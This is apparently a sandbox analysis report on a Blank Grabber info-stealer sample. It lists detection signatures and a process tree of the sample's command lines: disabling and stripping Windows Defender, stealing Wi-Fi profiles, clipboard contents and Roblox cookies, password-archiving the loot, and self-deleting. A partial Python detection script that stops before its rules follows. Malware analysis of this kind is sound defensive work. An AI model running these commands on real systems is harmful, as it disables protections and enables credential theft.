Windows Analysis Report
KpHYfxnJs6.exe

Overview

General Information

Sample name: KpHYfxnJs6.exe (renamed because the original name is a hash value)
Original sample name: 6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Analysis ID: 1584305
MD5: 41b147fd16a94a8ea6164177cf91733c
SHA1: f586388782d636b286ef606de997087f451fe11f
SHA256: 6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31
Tags: exe, user-zhuzhu0009

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
PE file contains section with special chars
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Removes signatures from Windows Defender
Self deletion via cmd or bat file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Process Tree

  • System is w10x64
  • KpHYfxnJs6.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\KpHYfxnJs6.exe" MD5: 41B147FD16A94A8EA6164177CF91733C)
    • KpHYfxnJs6.exe (PID: 7732 cmdline: "C:\Users\user\Desktop\KpHYfxnJs6.exe" MD5: 41B147FD16A94A8EA6164177CF91733C)
      • cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8108 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 7972 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8152 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 7988 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 8168 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()" MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • cmd.exe (PID: 8052 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 3668 cmdline: tasklist /FO LIST MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • cmd.exe (PID: 6960 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4476 cmdline: wmic csproduct get uuid MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 7560 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 2212 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • cmd.exe (PID: 1852 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7672 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • cmd.exe (PID: 7668 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5924 cmdline: wmic path win32_VideoController get name MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 3808 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6384 cmdline: wmic path win32_VideoController get name MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 6780 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 1888 cmdline: attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • cmd.exe (PID: 6472 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1208 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 1640 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 984 cmdline: tasklist /FO LIST MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • cmd.exe (PID: 1784 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 2140 cmdline: tasklist /FO LIST MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • cmd.exe (PID: 3904 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3888 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 4280 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2124 cmdline: powershell Get-Clipboard MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 3652 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 736 cmdline: tasklist /FO LIST MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • cmd.exe (PID: 3104 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7472 cmdline: tree /A /F MD5: 7E896B29B309DE74A72DEC7D59715EFD)
      • cmd.exe (PID: 7832 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 5088 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • cmd.exe (PID: 7492 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 4888 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 5728 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 6352 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • cmd.exe (PID: 4588 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7048 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • csc.exe (PID: 8096 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
            • cvtres.exe (PID: 7352 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED03.tmp" "c:\Users\user\AppData\Local\Temp\bifucm0t\CSCB2EB15F711B84CFFA3556DECAB136738.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • cmd.exe (PID: 2588 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 4268 cmdline: tree /A /F MD5: 7E896B29B309DE74A72DEC7D59715EFD)
      • cmd.exe (PID: 5132 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8004 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • cmd.exe (PID: 5408 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 2916 cmdline: getmac MD5: 31874C37626D02373768F72A64E76214)
      • cmd.exe (PID: 7432 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5868 cmdline: tree /A /F MD5: 7E896B29B309DE74A72DEC7D59715EFD)
      • cmd.exe (PID: 5312 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 6708 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • cmd.exe (PID: 8032 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8020 cmdline: tasklist /FO LIST MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • cmd.exe (PID: 3624 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5808 cmdline: tree /A /F MD5: 7E896B29B309DE74A72DEC7D59715EFD)
      • cmd.exe (PID: 7992 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7592 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 7588 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 6120 cmdline: tree /A /F MD5: 7E896B29B309DE74A72DEC7D59715EFD)
      • cmd.exe (PID: 7676 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8156 cmdline: tree /A /F MD5: 7E896B29B309DE74A72DEC7D59715EFD)
      • cmd.exe (PID: 4948 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8144 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 6384 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 2792 cmdline: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 6476 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2672 cmdline: wmic os get Caption MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 4464 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2032 cmdline: wmic computersystem get totalphysicalmemory MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 2936 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4468 cmdline: wmic csproduct get uuid MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 1744 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7552 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 2852 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6472 cmdline: wmic path win32_VideoController get name MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 2740 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7480 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 2180 cmdline: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 884 cmdline: ping localhost -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
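The process tree above is the raw material a detection engineer works from: every stage of this Blank Grabber run (Defender tampering, host fingerprinting, collection, archiving with a password, self-deletion) is a plain `cmd.exe /c` child of PID 7732. The script below is an added example, not Joe Sandbox code and not the sample's code. It takes a constructed list of PID/command-line pairs copied from the tree, decodes the `-EncodedCommand` payload (base64 of UTF-16LE; only the first 232 characters of the report's token are used, which is enough to see that it is a C# here-string that pulls in `System.Drawing`), runs a set of Sigma-style regex rules over each command line, and combines the hits into a verdict. The rule names and the three-stage scoring are this example's own labels, not SigmaHQ rule titles.

```python
"""Sigma-style triage of the command lines from the process tree above.

Added example, not Joe Sandbox code. EVENTS is constructed from the report's
process tree (PID and command line only); rule names are this example's own
labels; the -EncodedCommand token is cut to the first 232 characters of the
one the report shows.
"""
import base64
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

EVENTS = r"""
7964 C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'"
7972 C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
6960 C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
7668 C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
6472 C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"
4280 C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
7492 C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
4588 C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoA"
5132 C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
6384 C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *"
2180 C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe""
"""


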